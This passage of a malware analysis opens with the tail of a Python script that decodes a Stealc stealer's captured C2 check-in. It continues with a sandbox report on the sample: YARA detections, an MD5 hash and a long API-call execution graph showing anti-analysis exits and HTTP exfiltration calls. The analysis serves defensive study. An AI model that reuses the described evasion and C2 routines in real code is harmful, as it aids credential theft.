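        "hwid": fields["hwid"].decode("ascii"),
        "build": fields["build"].decode("ascii"),
        "reply": decode_c2_reply(reply),
    }


if __name__ == "__main__":
    print(checkin_summary(POST_CONTENT_TYPE, POST_CONTENT_LENGTH, POST_BODY, RESPONSE_BODY))
```

The Content-Length check is there because the reconstructed body must come out at exactly 211 bytes to match the capture; if a transcription drops a CRLF the mismatch surfaces immediately rather than as a silently mangled field value.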
                            Target ID:0
                            Start time:10:31:57
                            Start date:30/09/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x4b0000
                            File size:1'846'272 bytes
                            MD5 hash:E9912F8BBBA8A435C0770C5CB9DBDEE2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1371291825.0000000005000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true
                              Execution Graph

                              Execution Coverage:8.1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:25
                               [Execution graph: the interactive node/edge diagram is not reproduced. API-call nodes recoverable from the graph data, roughly in call order along the main path:]
                               • 8a6ea2 / 8a6ec9: RegOpenKeyA; 8a6f2a: GetNativeSystemInfo
                               • 4b45c0: RtlAllocateHeap, VirtualProtect (called in long chains from 4b2260 and 4b26a0)
                               • 4c9750: GetPEB; 4c9a93: LoadLibraryA x5; 4c9af4 to 4c9b92: GetProcAddress chain
                               • 4b1160: GetSystemInfo, with an ExitProcess branch at 4b117c; 4b1110: GetCurrentProcess, VirtualAllocExNuma, with an ExitProcess branch at 4b1141; 4b10a0: VirtualAlloc, VirtualFree
                               • 4c89b0: GlobalMemoryStatusEx, with an ExitProcess branch at 4b1292
                               • 4c6770: GetUserDefaultLangID, followed by five separate ExitProcess branches (the locale check flagged in the signatures)
                               • 4c78e0: GetProcessHeap, RtlAllocateHeap, GetComputerNameA; 4c7850: GetProcessHeap, RtlAllocateHeap, GetUserNameA; ExitProcess branch at 4b11c4
                               • 4c6ac2: OpenEventA, then either CreateEventA or CloseHandle + Sleep and loop back
                               • 4c6920: GetSystemTime; 4c6998: sscanf; 4c69aa: SystemTimeToFileTime x2, with an ExitProcess branch at 4c69d8
                               • 4c7500: GetWindowsDirectoryA; 4b4fb0: GetProcessHeap, RtlAllocateHeap, InternetOpenA
                               • 4ca740 / 4ca7a0 / 4ca8a0 / 4ca9b0: lstrlen, lstrcpy, lstrcat string-assembly helpers used throughout
API calls 14381->14382 14383 4b3b9a 14382->14383 14384 4b45c0 2 API calls 14383->14384 14385 4b3bb3 14384->14385 14386 4b45c0 2 API calls 14385->14386 14387 4b3bcc 14386->14387 14388 4b45c0 2 API calls 14387->14388 14389 4b3be5 14388->14389 14390 4b45c0 2 API calls 14389->14390 14391 4b3bfe 14390->14391 14392 4b45c0 2 API calls 14391->14392 14393 4b3c17 14392->14393 14394 4b45c0 2 API calls 14393->14394 14395 4b3c30 14394->14395 14396 4b45c0 2 API calls 14395->14396 14397 4b3c49 14396->14397 14398 4b45c0 2 API calls 14397->14398 14399 4b3c62 14398->14399 14400 4b45c0 2 API calls 14399->14400 14401 4b3c7b 14400->14401 14402 4b45c0 2 API calls 14401->14402 14403 4b3c94 14402->14403 14404 4b45c0 2 API calls 14403->14404 14405 4b3cad 14404->14405 14406 4b45c0 2 API calls 14405->14406 14407 4b3cc6 14406->14407 14408 4b45c0 2 API calls 14407->14408 14409 4b3cdf 14408->14409 14410 4b45c0 2 API calls 14409->14410 14411 4b3cf8 14410->14411 14412 4b45c0 2 API calls 14411->14412 14413 4b3d11 14412->14413 14414 4b45c0 2 API calls 14413->14414 14415 4b3d2a 14414->14415 14416 4b45c0 2 API calls 14415->14416 14417 4b3d43 14416->14417 14418 4b45c0 2 API calls 14417->14418 14419 4b3d5c 14418->14419 14420 4b45c0 2 API calls 14419->14420 14421 4b3d75 14420->14421 14422 4b45c0 2 API calls 14421->14422 14423 4b3d8e 14422->14423 14424 4b45c0 2 API calls 14423->14424 14425 4b3da7 14424->14425 14426 4b45c0 2 API calls 14425->14426 14427 4b3dc0 14426->14427 14428 4b45c0 2 API calls 14427->14428 14429 4b3dd9 14428->14429 14430 4b45c0 2 API calls 14429->14430 14431 4b3df2 14430->14431 14432 4b45c0 2 API calls 14431->14432 14433 4b3e0b 14432->14433 14434 4b45c0 2 API calls 14433->14434 14435 4b3e24 14434->14435 14436 4b45c0 2 API calls 14435->14436 14437 4b3e3d 14436->14437 14438 4b45c0 2 API calls 14437->14438 14439 4b3e56 14438->14439 14440 4b45c0 2 API calls 14439->14440 14441 4b3e6f 14440->14441 14442 4b45c0 2 API calls 14441->14442 14443 4b3e88 14442->14443 14444 4b45c0 2 API calls 
14443->14444 14445 4b3ea1 14444->14445 14446 4b45c0 2 API calls 14445->14446 14447 4b3eba 14446->14447 14448 4b45c0 2 API calls 14447->14448 14449 4b3ed3 14448->14449 14450 4b45c0 2 API calls 14449->14450 14451 4b3eec 14450->14451 14452 4b45c0 2 API calls 14451->14452 14453 4b3f05 14452->14453 14454 4b45c0 2 API calls 14453->14454 14455 4b3f1e 14454->14455 14456 4b45c0 2 API calls 14455->14456 14457 4b3f37 14456->14457 14458 4b45c0 2 API calls 14457->14458 14459 4b3f50 14458->14459 14460 4b45c0 2 API calls 14459->14460 14461 4b3f69 14460->14461 14462 4b45c0 2 API calls 14461->14462 14463 4b3f82 14462->14463 14464 4b45c0 2 API calls 14463->14464 14465 4b3f9b 14464->14465 14466 4b45c0 2 API calls 14465->14466 14467 4b3fb4 14466->14467 14468 4b45c0 2 API calls 14467->14468 14469 4b3fcd 14468->14469 14470 4b45c0 2 API calls 14469->14470 14471 4b3fe6 14470->14471 14472 4b45c0 2 API calls 14471->14472 14473 4b3fff 14472->14473 14474 4b45c0 2 API calls 14473->14474 14475 4b4018 14474->14475 14476 4b45c0 2 API calls 14475->14476 14477 4b4031 14476->14477 14478 4b45c0 2 API calls 14477->14478 14479 4b404a 14478->14479 14480 4b45c0 2 API calls 14479->14480 14481 4b4063 14480->14481 14482 4b45c0 2 API calls 14481->14482 14483 4b407c 14482->14483 14484 4b45c0 2 API calls 14483->14484 14485 4b4095 14484->14485 14486 4b45c0 2 API calls 14485->14486 14487 4b40ae 14486->14487 14488 4b45c0 2 API calls 14487->14488 14489 4b40c7 14488->14489 14490 4b45c0 2 API calls 14489->14490 14491 4b40e0 14490->14491 14492 4b45c0 2 API calls 14491->14492 14493 4b40f9 14492->14493 14494 4b45c0 2 API calls 14493->14494 14495 4b4112 14494->14495 14496 4b45c0 2 API calls 14495->14496 14497 4b412b 14496->14497 14498 4b45c0 2 API calls 14497->14498 14499 4b4144 14498->14499 14500 4b45c0 2 API calls 14499->14500 14501 4b415d 14500->14501 14502 4b45c0 2 API calls 14501->14502 14503 4b4176 14502->14503 14504 4b45c0 2 API calls 14503->14504 14505 4b418f 14504->14505 14506 4b45c0 2 API calls 14505->14506 
14507 4b41a8 14506->14507 14508 4b45c0 2 API calls 14507->14508 14509 4b41c1 14508->14509 14510 4b45c0 2 API calls 14509->14510 14511 4b41da 14510->14511 14512 4b45c0 2 API calls 14511->14512 14513 4b41f3 14512->14513 14514 4b45c0 2 API calls 14513->14514 14515 4b420c 14514->14515 14516 4b45c0 2 API calls 14515->14516 14517 4b4225 14516->14517 14518 4b45c0 2 API calls 14517->14518 14519 4b423e 14518->14519 14520 4b45c0 2 API calls 14519->14520 14521 4b4257 14520->14521 14522 4b45c0 2 API calls 14521->14522 14523 4b4270 14522->14523 14524 4b45c0 2 API calls 14523->14524 14525 4b4289 14524->14525 14526 4b45c0 2 API calls 14525->14526 14527 4b42a2 14526->14527 14528 4b45c0 2 API calls 14527->14528 14529 4b42bb 14528->14529 14530 4b45c0 2 API calls 14529->14530 14531 4b42d4 14530->14531 14532 4b45c0 2 API calls 14531->14532 14533 4b42ed 14532->14533 14534 4b45c0 2 API calls 14533->14534 14535 4b4306 14534->14535 14536 4b45c0 2 API calls 14535->14536 14537 4b431f 14536->14537 14538 4b45c0 2 API calls 14537->14538 14539 4b4338 14538->14539 14540 4b45c0 2 API calls 14539->14540 14541 4b4351 14540->14541 14542 4b45c0 2 API calls 14541->14542 14543 4b436a 14542->14543 14544 4b45c0 2 API calls 14543->14544 14545 4b4383 14544->14545 14546 4b45c0 2 API calls 14545->14546 14547 4b439c 14546->14547 14548 4b45c0 2 API calls 14547->14548 14549 4b43b5 14548->14549 14550 4b45c0 2 API calls 14549->14550 14551 4b43ce 14550->14551 14552 4b45c0 2 API calls 14551->14552 14553 4b43e7 14552->14553 14554 4b45c0 2 API calls 14553->14554 14555 4b4400 14554->14555 14556 4b45c0 2 API calls 14555->14556 14557 4b4419 14556->14557 14558 4b45c0 2 API calls 14557->14558 14559 4b4432 14558->14559 14560 4b45c0 2 API calls 14559->14560 14561 4b444b 14560->14561 14562 4b45c0 2 API calls 14561->14562 14563 4b4464 14562->14563 14564 4b45c0 2 API calls 14563->14564 14565 4b447d 14564->14565 14566 4b45c0 2 API calls 14565->14566 14567 4b4496 14566->14567 14568 4b45c0 2 API calls 14567->14568 14569 4b44af 
14568->14569 14570 4b45c0 2 API calls 14569->14570 14571 4b44c8 14570->14571 14572 4b45c0 2 API calls 14571->14572 14573 4b44e1 14572->14573 14574 4b45c0 2 API calls 14573->14574 14575 4b44fa 14574->14575 14576 4b45c0 2 API calls 14575->14576 14577 4b4513 14576->14577 14578 4b45c0 2 API calls 14577->14578 14579 4b452c 14578->14579 14580 4b45c0 2 API calls 14579->14580 14581 4b4545 14580->14581 14582 4b45c0 2 API calls 14581->14582 14583 4b455e 14582->14583 14584 4b45c0 2 API calls 14583->14584 14585 4b4577 14584->14585 14586 4b45c0 2 API calls 14585->14586 14587 4b4590 14586->14587 14588 4b45c0 2 API calls 14587->14588 14589 4b45a9 14588->14589 14590 4c9c10 14589->14590 14591 4ca036 8 API calls 14590->14591 14592 4c9c20 43 API calls 14590->14592 14593 4ca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14591->14593 14594 4ca146 14591->14594 14592->14591 14593->14594 14595 4ca216 14594->14595 14596 4ca153 8 API calls 14594->14596 14597 4ca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14595->14597 14598 4ca298 14595->14598 14596->14595 14597->14598 14599 4ca2a5 6 API calls 14598->14599 14600 4ca337 14598->14600 14599->14600 14601 4ca41f 14600->14601 14602 4ca344 9 API calls 14600->14602 14603 4ca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14601->14603 14604 4ca4a2 14601->14604 14602->14601 14603->14604 14605 4ca4dc 14604->14605 14606 4ca4ab GetProcAddress GetProcAddress 14604->14606 14607 4ca515 14605->14607 14608 4ca4e5 GetProcAddress GetProcAddress 14605->14608 14606->14605 14609 4ca612 14607->14609 14610 4ca522 10 API calls 14607->14610 14608->14607 14611 4ca67d 14609->14611 14612 4ca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14609->14612 14610->14609 14613 4ca69e 14611->14613 14614 4ca686 GetProcAddress 14611->14614 14612->14611 14615 4c5ca3 14613->14615 14616 4ca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14613->14616 
14614->14613 14617 4b1590 14615->14617 14616->14615 15736 4b1670 14617->15736 14620 4ca7a0 lstrcpy 14621 4b15b5 14620->14621 14622 4ca7a0 lstrcpy 14621->14622 14623 4b15c7 14622->14623 14624 4ca7a0 lstrcpy 14623->14624 14625 4b15d9 14624->14625 14626 4ca7a0 lstrcpy 14625->14626 14627 4b1663 14626->14627 14628 4c5510 14627->14628 14629 4c5521 14628->14629 14630 4ca820 2 API calls 14629->14630 14631 4c552e 14630->14631 14632 4ca820 2 API calls 14631->14632 14633 4c553b 14632->14633 14634 4ca820 2 API calls 14633->14634 14635 4c5548 14634->14635 14636 4ca740 lstrcpy 14635->14636 14637 4c5555 14636->14637 14638 4ca740 lstrcpy 14637->14638 14639 4c5562 14638->14639 14640 4ca740 lstrcpy 14639->14640 14641 4c556f 14640->14641 14642 4ca740 lstrcpy 14641->14642 14652 4c557c 14642->14652 14643 4c52c0 25 API calls 14643->14652 14644 4c51f0 20 API calls 14644->14652 14645 4c5643 StrCmpCA 14645->14652 14646 4c56a0 StrCmpCA 14647 4c57dc 14646->14647 14646->14652 14648 4ca8a0 lstrcpy 14647->14648 14649 4c57e8 14648->14649 14650 4ca820 2 API calls 14649->14650 14653 4c57f6 14650->14653 14651 4ca740 lstrcpy 14651->14652 14652->14643 14652->14644 14652->14645 14652->14646 14652->14651 14654 4c5856 StrCmpCA 14652->14654 14661 4ca820 lstrlen lstrcpy 14652->14661 14663 4c5a0b StrCmpCA 14652->14663 14672 4b1590 lstrcpy 14652->14672 14677 4c578a StrCmpCA 14652->14677 14679 4c593f StrCmpCA 14652->14679 14680 4ca7a0 lstrcpy 14652->14680 14682 4ca8a0 lstrcpy 14652->14682 14656 4ca820 2 API calls 14653->14656 14654->14652 14655 4c5991 14654->14655 14657 4ca8a0 lstrcpy 14655->14657 14658 4c5805 14656->14658 14659 4c599d 14657->14659 14660 4b1670 lstrcpy 14658->14660 14662 4ca820 2 API calls 14659->14662 14681 4c5811 14660->14681 14661->14652 14664 4c59ab 14662->14664 14665 4c5a28 14663->14665 14666 4c5a16 Sleep 14663->14666 14667 4ca820 2 API calls 14664->14667 14668 4ca8a0 lstrcpy 14665->14668 14666->14652 14669 4c59ba 14667->14669 14671 4c5a34 14668->14671 14670 4b1670 lstrcpy 14669->14670 
14670->14681 14673 4ca820 2 API calls 14671->14673 14672->14652 14674 4c5a43 14673->14674 14675 4ca820 2 API calls 14674->14675 14676 4c5a52 14675->14676 14678 4b1670 lstrcpy 14676->14678 14677->14652 14678->14681 14679->14652 14680->14652 14681->13735 14682->14652 14684 4c754c 14683->14684 14685 4c7553 GetVolumeInformationA 14683->14685 14684->14685 14686 4c7591 14685->14686 14687 4c75fc GetProcessHeap RtlAllocateHeap 14686->14687 14688 4c7628 wsprintfA 14687->14688 14689 4c7619 14687->14689 14691 4ca740 lstrcpy 14688->14691 14690 4ca740 lstrcpy 14689->14690 14692 4c5da7 14690->14692 14691->14692 14692->13756 14694 4ca7a0 lstrcpy 14693->14694 14695 4b4899 14694->14695 15745 4b47b0 14695->15745 14697 4b48a5 14698 4ca740 lstrcpy 14697->14698 14699 4b48d7 14698->14699 14700 4ca740 lstrcpy 14699->14700 14701 4b48e4 14700->14701 14702 4ca740 lstrcpy 14701->14702 14703 4b48f1 14702->14703 14704 4ca740 lstrcpy 14703->14704 14705 4b48fe 14704->14705 14706 4ca740 lstrcpy 14705->14706 14707 4b490b InternetOpenA StrCmpCA 14706->14707 14708 4b4944 14707->14708 14709 4b4ecb InternetCloseHandle 14708->14709 15751 4c8b60 14708->15751 14711 4b4ee8 14709->14711 15766 4b9ac0 CryptStringToBinaryA 14711->15766 14712 4b4963 15759 4ca920 14712->15759 14715 4b4976 14717 4ca8a0 lstrcpy 14715->14717 14723 4b497f 14717->14723 14718 4ca820 2 API calls 14719 4b4f05 14718->14719 14720 4ca9b0 4 API calls 14719->14720 14722 4b4f1b 14720->14722 14721 4b4f27 codecvt 14725 4ca7a0 lstrcpy 14721->14725 14724 4ca8a0 lstrcpy 14722->14724 14726 4ca9b0 4 API calls 14723->14726 14724->14721 14738 4b4f57 14725->14738 14727 4b49a9 14726->14727 14728 4ca8a0 lstrcpy 14727->14728 14729 4b49b2 14728->14729 14730 4ca9b0 4 API calls 14729->14730 14731 4b49d1 14730->14731 14732 4ca8a0 lstrcpy 14731->14732 14733 4b49da 14732->14733 14734 4ca920 3 API calls 14733->14734 14735 4b49f8 14734->14735 14736 4ca8a0 lstrcpy 14735->14736 14737 4b4a01 14736->14737 14739 4ca9b0 4 API calls 14737->14739 14738->13759 14740 
4b4a20 14739->14740 14741 4ca8a0 lstrcpy 14740->14741 14742 4b4a29 14741->14742 14743 4ca9b0 4 API calls 14742->14743 14744 4b4a48 14743->14744 14745 4ca8a0 lstrcpy 14744->14745 14746 4b4a51 14745->14746 14747 4ca9b0 4 API calls 14746->14747 14748 4b4a7d 14747->14748 14749 4ca920 3 API calls 14748->14749 14750 4b4a84 14749->14750 14751 4ca8a0 lstrcpy 14750->14751 14752 4b4a8d 14751->14752 14753 4b4aa3 InternetConnectA 14752->14753 14753->14709 14754 4b4ad3 HttpOpenRequestA 14753->14754 14756 4b4b28 14754->14756 14757 4b4ebe InternetCloseHandle 14754->14757 14758 4ca9b0 4 API calls 14756->14758 14757->14709 14759 4b4b3c 14758->14759 14760 4ca8a0 lstrcpy 14759->14760 14761 4b4b45 14760->14761 14762 4ca920 3 API calls 14761->14762 14763 4b4b63 14762->14763 14764 4ca8a0 lstrcpy 14763->14764 14765 4b4b6c 14764->14765 14766 4ca9b0 4 API calls 14765->14766 14767 4b4b8b 14766->14767 14768 4ca8a0 lstrcpy 14767->14768 14769 4b4b94 14768->14769 14770 4ca9b0 4 API calls 14769->14770 14771 4b4bb5 14770->14771 14772 4ca8a0 lstrcpy 14771->14772 14773 4b4bbe 14772->14773 14774 4ca9b0 4 API calls 14773->14774 14775 4b4bde 14774->14775 14776 4ca8a0 lstrcpy 14775->14776 14777 4b4be7 14776->14777 14778 4ca9b0 4 API calls 14777->14778 14779 4b4c06 14778->14779 14780 4ca8a0 lstrcpy 14779->14780 14781 4b4c0f 14780->14781 14782 4ca920 3 API calls 14781->14782 14783 4b4c2d 14782->14783 14784 4ca8a0 lstrcpy 14783->14784 14785 4b4c36 14784->14785 14786 4ca9b0 4 API calls 14785->14786 14787 4b4c55 14786->14787 14788 4ca8a0 lstrcpy 14787->14788 14789 4b4c5e 14788->14789 14790 4ca9b0 4 API calls 14789->14790 14791 4b4c7d 14790->14791 14792 4ca8a0 lstrcpy 14791->14792 14793 4b4c86 14792->14793 14794 4ca920 3 API calls 14793->14794 14795 4b4ca4 14794->14795 14796 4ca8a0 lstrcpy 14795->14796 14797 4b4cad 14796->14797 14798 4ca9b0 4 API calls 14797->14798 14799 4b4ccc 14798->14799 14800 4ca8a0 lstrcpy 14799->14800 14801 4b4cd5 14800->14801 14802 4ca9b0 4 API calls 14801->14802 14803 4b4cf6 
14802->14803 14804 4ca8a0 lstrcpy 14803->14804 14805 4b4cff 14804->14805 14806 4ca9b0 4 API calls 14805->14806 14807 4b4d1f 14806->14807 14808 4ca8a0 lstrcpy 14807->14808 14809 4b4d28 14808->14809 14810 4ca9b0 4 API calls 14809->14810 14811 4b4d47 14810->14811 14812 4ca8a0 lstrcpy 14811->14812 14813 4b4d50 14812->14813 14814 4ca920 3 API calls 14813->14814 14815 4b4d6e 14814->14815 14816 4ca8a0 lstrcpy 14815->14816 14817 4b4d77 14816->14817 14818 4ca740 lstrcpy 14817->14818 14819 4b4d92 14818->14819 14820 4ca920 3 API calls 14819->14820 14821 4b4db3 14820->14821 14822 4ca920 3 API calls 14821->14822 14823 4b4dba 14822->14823 14824 4ca8a0 lstrcpy 14823->14824 14825 4b4dc6 14824->14825 14826 4b4de7 lstrlen 14825->14826 14827 4b4dfa 14826->14827 14828 4b4e03 lstrlen 14827->14828 15765 4caad0 14828->15765 14830 4b4e13 HttpSendRequestA 14831 4b4e32 InternetReadFile 14830->14831 14832 4b4e67 InternetCloseHandle 14831->14832 14837 4b4e5e 14831->14837 14835 4ca800 14832->14835 14834 4ca9b0 4 API calls 14834->14837 14835->14757 14836 4ca8a0 lstrcpy 14836->14837 14837->14831 14837->14832 14837->14834 14837->14836 15772 4caad0 14838->15772 14840 4c17c4 StrCmpCA 14841 4c17cf ExitProcess 14840->14841 14842 4c17d7 14840->14842 14843 4c19c2 14842->14843 14844 4c18ad StrCmpCA 14842->14844 14845 4c18cf StrCmpCA 14842->14845 14846 4c185d StrCmpCA 14842->14846 14847 4c187f StrCmpCA 14842->14847 14848 4c1970 StrCmpCA 14842->14848 14849 4c18f1 StrCmpCA 14842->14849 14850 4c1951 StrCmpCA 14842->14850 14851 4c1932 StrCmpCA 14842->14851 14852 4c1913 StrCmpCA 14842->14852 14853 4ca820 lstrlen lstrcpy 14842->14853 14843->13761 14844->14842 14845->14842 14846->14842 14847->14842 14848->14842 14849->14842 14850->14842 14851->14842 14852->14842 14853->14842 14855 4ca7a0 lstrcpy 14854->14855 14856 4b5979 14855->14856 14857 4b47b0 2 API calls 14856->14857 14858 4b5985 14857->14858 14859 4ca740 lstrcpy 14858->14859 14860 4b59ba 14859->14860 14861 4ca740 lstrcpy 14860->14861 14862 4b59c7 
14861->14862 14863 4ca740 lstrcpy 14862->14863 14864 4b59d4 14863->14864 14865 4ca740 lstrcpy 14864->14865 14866 4b59e1 14865->14866 14867 4ca740 lstrcpy 14866->14867 14868 4b59ee InternetOpenA StrCmpCA 14867->14868 14869 4b5a1d 14868->14869 14870 4b5fc3 InternetCloseHandle 14869->14870 14872 4c8b60 3 API calls 14869->14872 14871 4b5fe0 14870->14871 14875 4b9ac0 4 API calls 14871->14875 14873 4b5a3c 14872->14873 14874 4ca920 3 API calls 14873->14874 14876 4b5a4f 14874->14876 14877 4b5fe6 14875->14877 14878 4ca8a0 lstrcpy 14876->14878 14879 4ca820 2 API calls 14877->14879 14881 4b601f codecvt 14877->14881 14883 4b5a58 14878->14883 14880 4b5ffd 14879->14880 14882 4ca9b0 4 API calls 14880->14882 14885 4ca7a0 lstrcpy 14881->14885 14884 4b6013 14882->14884 14887 4ca9b0 4 API calls 14883->14887 14886 4ca8a0 lstrcpy 14884->14886 14895 4b604f 14885->14895 14886->14881 14888 4b5a82 14887->14888 14889 4ca8a0 lstrcpy 14888->14889 14890 4b5a8b 14889->14890 14891 4ca9b0 4 API calls 14890->14891 14892 4b5aaa 14891->14892 14893 4ca8a0 lstrcpy 14892->14893 14894 4b5ab3 14893->14894 14896 4ca920 3 API calls 14894->14896 14895->13767 14897 4b5ad1 14896->14897 14898 4ca8a0 lstrcpy 14897->14898 14899 4b5ada 14898->14899 14900 4ca9b0 4 API calls 14899->14900 14901 4b5af9 14900->14901 14902 4ca8a0 lstrcpy 14901->14902 14903 4b5b02 14902->14903 14904 4ca9b0 4 API calls 14903->14904 14905 4b5b21 14904->14905 14906 4ca8a0 lstrcpy 14905->14906 14907 4b5b2a 14906->14907 14908 4ca9b0 4 API calls 14907->14908 14909 4b5b56 14908->14909 14910 4ca920 3 API calls 14909->14910 14911 4b5b5d 14910->14911 14912 4ca8a0 lstrcpy 14911->14912 14913 4b5b66 14912->14913 14914 4b5b7c InternetConnectA 14913->14914 14914->14870 14915 4b5bac HttpOpenRequestA 14914->14915 14917 4b5c0b 14915->14917 14918 4b5fb6 InternetCloseHandle 14915->14918 14919 4ca9b0 4 API calls 14917->14919 14918->14870 14920 4b5c1f 14919->14920 14921 4ca8a0 lstrcpy 14920->14921 14922 4b5c28 14921->14922 14923 4ca920 3 API calls 
14922->14923 14924 4b5c46 14923->14924 14925 4ca8a0 lstrcpy 14924->14925 14926 4b5c4f 14925->14926 14927 4ca9b0 4 API calls 14926->14927 14928 4b5c6e 14927->14928 14929 4ca8a0 lstrcpy 14928->14929 14930 4b5c77 14929->14930 14931 4ca9b0 4 API calls 14930->14931 14932 4b5c98 14931->14932 14933 4ca8a0 lstrcpy 14932->14933 14934 4b5ca1 14933->14934 14935 4ca9b0 4 API calls 14934->14935 14936 4b5cc1 14935->14936 14937 4ca8a0 lstrcpy 14936->14937 14938 4b5cca 14937->14938 14939 4ca9b0 4 API calls 14938->14939 14940 4b5ce9 14939->14940 14941 4ca8a0 lstrcpy 14940->14941 14942 4b5cf2 14941->14942 14943 4ca920 3 API calls 14942->14943 14944 4b5d10 14943->14944 14945 4ca8a0 lstrcpy 14944->14945 14946 4b5d19 14945->14946 14947 4ca9b0 4 API calls 14946->14947 14948 4b5d38 14947->14948 14949 4ca8a0 lstrcpy 14948->14949 14950 4b5d41 14949->14950 14951 4ca9b0 4 API calls 14950->14951 14952 4b5d60 14951->14952 14953 4ca8a0 lstrcpy 14952->14953 14954 4b5d69 14953->14954 14955 4ca920 3 API calls 14954->14955 14956 4b5d87 14955->14956 14957 4ca8a0 lstrcpy 14956->14957 14958 4b5d90 14957->14958 14959 4ca9b0 4 API calls 14958->14959 14960 4b5daf 14959->14960 14961 4ca8a0 lstrcpy 14960->14961 14962 4b5db8 14961->14962 14963 4ca9b0 4 API calls 14962->14963 14964 4b5dd9 14963->14964 14965 4ca8a0 lstrcpy 14964->14965 14966 4b5de2 14965->14966 14967 4ca9b0 4 API calls 14966->14967 14968 4b5e02 14967->14968 14969 4ca8a0 lstrcpy 14968->14969 14970 4b5e0b 14969->14970 14971 4ca9b0 4 API calls 14970->14971 14972 4b5e2a 14971->14972 14973 4ca8a0 lstrcpy 14972->14973 14974 4b5e33 14973->14974 14975 4ca920 3 API calls 14974->14975 14976 4b5e54 14975->14976 14977 4ca8a0 lstrcpy 14976->14977 14978 4b5e5d 14977->14978 14979 4b5e70 lstrlen 14978->14979 15773 4caad0 14979->15773 14981 4b5e81 lstrlen GetProcessHeap RtlAllocateHeap 15774 4caad0 14981->15774 14983 4b5eae lstrlen 14984 4b5ebe 14983->14984 14985 4b5ed7 lstrlen 14984->14985 14986 4b5ee7 14985->14986 14987 4b5ef0 lstrlen 14986->14987 14988 
4b5f04 14987->14988 14989 4b5f1a lstrlen 14988->14989 15775 4caad0 14989->15775 14991 4b5f2a HttpSendRequestA 14992 4b5f35 InternetReadFile 14991->14992 14993 4b5f6a InternetCloseHandle 14992->14993 14997 4b5f61 14992->14997 14993->14918 14995 4ca9b0 4 API calls 14995->14997 14996 4ca8a0 lstrcpy 14996->14997 14997->14992 14997->14993 14997->14995 14997->14996 15000 4c1077 14998->15000 14999 4c1151 14999->13769 15000->14999 15001 4ca820 lstrlen lstrcpy 15000->15001 15001->15000 15008 4c0db7 15002->15008 15003 4c0f17 15003->13777 15004 4c0ea4 StrCmpCA 15004->15008 15005 4c0e27 StrCmpCA 15005->15008 15006 4c0e67 StrCmpCA 15006->15008 15007 4ca820 lstrlen lstrcpy 15007->15008 15008->15003 15008->15004 15008->15005 15008->15006 15008->15007 15010 4c0f67 15009->15010 15011 4c1044 15010->15011 15012 4ca820 lstrlen lstrcpy 15010->15012 15013 4c0fb2 StrCmpCA 15010->15013 15011->13785 15012->15010 15013->15010 15015 4ca740 lstrcpy 15014->15015 15016 4c1a26 15015->15016 15017 4ca9b0 4 API calls 15016->15017 15018 4c1a37 15017->15018 15019 4ca8a0 lstrcpy 15018->15019 15020 4c1a40 15019->15020 15021 4ca9b0 4 API calls 15020->15021 15022 4c1a5b 15021->15022 15023 4ca8a0 lstrcpy 15022->15023 15024 4c1a64 15023->15024 15025 4ca9b0 4 API calls 15024->15025 15026 4c1a7d 15025->15026 15027 4ca8a0 lstrcpy 15026->15027 15028 4c1a86 15027->15028 15029 4ca9b0 4 API calls 15028->15029 15030 4c1aa1 15029->15030 15031 4ca8a0 lstrcpy 15030->15031 15032 4c1aaa 15031->15032 15033 4ca9b0 4 API calls 15032->15033 15034 4c1ac3 15033->15034 15035 4ca8a0 lstrcpy 15034->15035 15036 4c1acc 15035->15036 15037 4ca9b0 4 API calls 15036->15037 15038 4c1ae7 15037->15038 15039 4ca8a0 lstrcpy 15038->15039 15040 4c1af0 15039->15040 15041 4ca9b0 4 API calls 15040->15041 15042 4c1b09 15041->15042 15043 4ca8a0 lstrcpy 15042->15043 15044 4c1b12 15043->15044 15045 4ca9b0 4 API calls 15044->15045 15046 4c1b2d 15045->15046 15047 4ca8a0 lstrcpy 15046->15047 15048 4c1b36 15047->15048 15049 4ca9b0 4 API calls 
15048->15049 15050 4c1b4f 15049->15050 15051 4ca8a0 lstrcpy 15050->15051 15052 4c1b58 15051->15052 15053 4ca9b0 4 API calls 15052->15053 15054 4c1b76 15053->15054 15055 4ca8a0 lstrcpy 15054->15055 15056 4c1b7f 15055->15056 15057 4c7500 6 API calls 15056->15057 15058 4c1b96 15057->15058 15059 4ca920 3 API calls 15058->15059 15060 4c1ba9 15059->15060 15061 4ca8a0 lstrcpy 15060->15061 15062 4c1bb2 15061->15062 15063 4ca9b0 4 API calls 15062->15063 15064 4c1bdc 15063->15064 15065 4ca8a0 lstrcpy 15064->15065 15066 4c1be5 15065->15066 15067 4ca9b0 4 API calls 15066->15067 15068 4c1c05 15067->15068 15069 4ca8a0 lstrcpy 15068->15069 15070 4c1c0e 15069->15070 15776 4c7690 GetProcessHeap RtlAllocateHeap 15070->15776 15073 4ca9b0 4 API calls 15074 4c1c2e 15073->15074 15075 4ca8a0 lstrcpy 15074->15075 15076 4c1c37 15075->15076 15077 4ca9b0 4 API calls 15076->15077 15078 4c1c56 15077->15078 15079 4ca8a0 lstrcpy 15078->15079 15080 4c1c5f 15079->15080 15081 4ca9b0 4 API calls 15080->15081 15082 4c1c80 15081->15082 15083 4ca8a0 lstrcpy 15082->15083 15084 4c1c89 15083->15084 15783 4c77c0 GetCurrentProcess IsWow64Process 15084->15783 15087 4ca9b0 4 API calls 15088 4c1ca9 15087->15088 15089 4ca8a0 lstrcpy 15088->15089 15090 4c1cb2 15089->15090 15091 4ca9b0 4 API calls 15090->15091 